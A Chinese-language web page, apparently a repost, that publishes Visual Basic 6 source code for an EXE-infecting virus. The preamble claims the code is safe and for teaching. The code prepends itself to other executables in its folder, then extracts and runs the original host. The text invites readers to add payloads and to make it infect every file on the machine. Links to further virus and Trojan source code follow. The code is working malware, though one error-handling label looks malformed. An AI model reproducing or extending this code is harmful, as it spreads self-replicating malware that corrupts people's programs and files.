使大家清楚认识病毒程序的运行机理,提高自身程序的抵抗力。

说明:
1、本代码目前仅是实验模型,给新手讲解原理之用,不会失控,绝对安全。
2、本代码仅实现了感染EXE的功能,其他的功能还须你自己加入。
3、为了目前的安全,本病毒只是在病毒所在的目录下随机选一个文件感染,你可以利用此功能来调试;将来你可以修改,让它不断的循环搜索计算机上的所有文件。
4、最重要的:不要搞恶意破坏,否则真进了监狱后果自负!

代码:

Option Explicit
Private Victim As String ''要感染的文件的名字
Private HostLen As Long ''要感染的文件的大小
Private vbArray() As Byte ''病毒的代码
Private hArray() As Byte ''要感染的文件的代码
Private lenght As Long
Private MySize As Integer ''病毒的大小
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Sub form_Initialize()
    Dim i As Long
    On Error GoTo vbVerror ''出错处理
    ''原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。
    Open App.path & "\" & App.EXEName & ".exe" For Binary Access Read _
         As #1
    ReDim MyArray(LOF(1) - 1)
    MySize = LOF(1)
    ReDim vbArray(MySize)
    Get #1, 1, vbArray
    Close #1
    ''这是在读自己的代码
    Victim = Dir(App.path & "\" & "*.EXE") ''随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)
    While Victim <> ""
        If Format$(Victim, ">") <> Format$(App.EXEName & ".EXE", ">") Then
            Open App.path & "\" & Victim For Binary Access Read As #1
            ReDim hArray(LOF(1))
            Get #1, 1, hArray
            Close #1
            ''读出病毒自身的代码
            If hArray(&H69) <> &H4D Then
                i = hArray(&H3C)
                If hArray(i) = &H50 Then
                    Open App.path & "\" & Victim For Binary Access Write As #1
                    Put #1, , vbArray
                    Put #1, MySize, hArray
                    Close #1
                End If ''要保证被感染的不是空文件(不是圈套)
            End If
        End If
        ''读出准备被感染的文件的代码
        Victim = Dir() ''Next
    Wend
    ''下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。
    Open App.path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    lenght = LOF(1) - MySize
    If lenght <> 0 Then
        ReDim vbArray(lenght - 1)
        Get #1, MySize, vbArray
        Close #1
        Open App.path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
        Put #1, , vbArray
        Close #1
        idProg = Shell(App.path & "\" & App.EXEName & ".eve", vbNormalFocus)
        hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
        GetExitCodeProcess hProg, iExit
        Do While iExit = STILL_ACTIVE
            DoEvents
            GetExitCodeProcess hProg, iExit
        Loop
        Kill App.path & "\" & App.EXEName & ".eve"
    Else
        Close #1
    End If
    End
    vbVerror
    ''出错处理,空着就可以了
End Sub
摘自:网络整理

相关文章参考:

☆VB直接播放EXE文件中的声音文件

☆VB将配置保存到EXE本身(生成EXE木马程序)

更多精彩>>>

VB 感染EXE 程序病毒源码相关推荐

  1. Windows病毒源码

    有几个Windows小virus,大家一起分享啦~ 鼠标乱闪C++: #include<bits/stdc++.h> #include<windows.h> #pragma c ...

  2. 病毒源代码Java_金猪报喜病毒源码 - 开源中国社区.pdf

    金猪报喜病毒源码 - 开源中国社区 2015年4月22 日 金猪报喜病毒源码 - 开源中国社区 首页 开源项 目 Java 开源软件 C# 开源软件 PHP 开源软件 C/C++ 开源软件 Ruby ...

  3. 高仿带感魔性病毒源码+成品(最近很火的)

    高仿带感魔性病毒源码+成品(最近很火的) 娱乐使用.没破坏性 会改壁纸和打乱桌面图标顺序 自己改回来就好 演示地址: 下载地址:链接: http://pan.baidu.com/s/1dF2ZlU5 ...

  4. Trojan.Win32病毒源码分析

    该病毒为木马类,病毒运行后复制自身到系统目录,衍生病毒文件,并删除自身. 创建服务,并以服务的方式达到随机启动的目的.设置远程线程来执行2b79.dll.4e92.dll,在执行时插入到EXPLORE ...

  5. 一个简易的c语言病毒源码

    /*C语言病毒代码*/ #include <io.h> #include <dir.h> #include <stdio.h> #include <stdli ...

  6. c语言写骷髅病毒源码,骷髅病毒分析报告

    一:目录 1.样本信息 2.行为分析 3.样本分析 4.详细分析 二:样本信息 1.样本名称:样本.exe(脱壳后为样本dump.exe) 2.md5:5b8bc92296c2fa60fecc6316 ...

  7. 网上流行的欢乐病毒源码

    把一下代码复制粘贴到新建的vbs文件中,再双击运行即可!!! PS:病毒文件,大家谨慎使用. Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,F ...

  8. c语言格式化 病毒源码,【病毒】震荡波病毒C语言源码

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 /* #i nclude #i nclude #i nclude #i nclude #i nclude #define NORM "\033[ ...

  9. 一个简易的c语言病毒源码,求简单病毒代码

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 #include #include void main(void) { virus(); } int virus() { struct ffblk ffb ...

最新文章

  1. shell脚本编程之更多结构化命令
  2. 公钥密码学标准(Public Key Cryptography Standards, PKCS)
  3. NET问答: 发布 asp.net core 时如何修改 ASPNETCORE_ENVIRONMENT 环境变量?
  4. c语言有趣代码_【新课预知】——C语言程序设计
  5. Qt生成的exe中为什么会带有不该有的盾牌?
  6. Win10安装MySQL5.7(图文详解)
  7. 基础知识:Mac上更改“字体”窗口中的字体大小
  8. 计算机界面视频录制软件,怎么进行电脑界面上的画面录制,推荐下好用的电脑录屏软件呗...
  9. .net中使用ckeditor4+ckfinder上传图片
  10. Google 开发者账号(验证ID)
  11. 1加9pro刷个lineageOS Android11
  12. 【网络编程实践--陈硕】2.4.4 procmon 程序的设计实现
  13. Java图形化界面编程超详细知识点(9)——Swing_树
  14. TP与laravel简介
  15. uniapp 拉起微信客服功能
  16. 中国标准时间、2021-01-11T09:49:43.000+0000等各种时间的转换、各种时间处理
  17. AMCL定位融合UWB
  18. 吞吐量和TPS的区别
  19. BIOS 与 CPU关系
  20. h5背景图片尺寸怎么设置_CSS3中background-size实现背景图片大小可自定义的几种效果(代码实例 )...

热门文章

  1. 英特尔再爆重大芯片漏洞,苹果谷歌微软相继中招!
  2. 华为专利全球第一:哪里跌倒,哪里爬起!
  3. 未来十年,小程序将消失!
  4. 阿里发力线下渠道,腾讯京东该如何打破其流量优势?
  5. 中兴恢复产能还需数周;前苹果工程师已获保释;iPhone再现爆炸门 | 极客头条...
  6. 凭什么说“Python 太慢,Java 太笨拙,我讨厌 JavaScript”?
  7. 枯燥编程加奇炫美术 —— 看育碧 Ubisoft 如何开发游戏大作
  8. html垂直线6,HTML的垂直线
  9. python拦截数据包_使用Python进行TCP数据包注入(伪造)
  10. mysql安装方法_MySQL安装的三种方式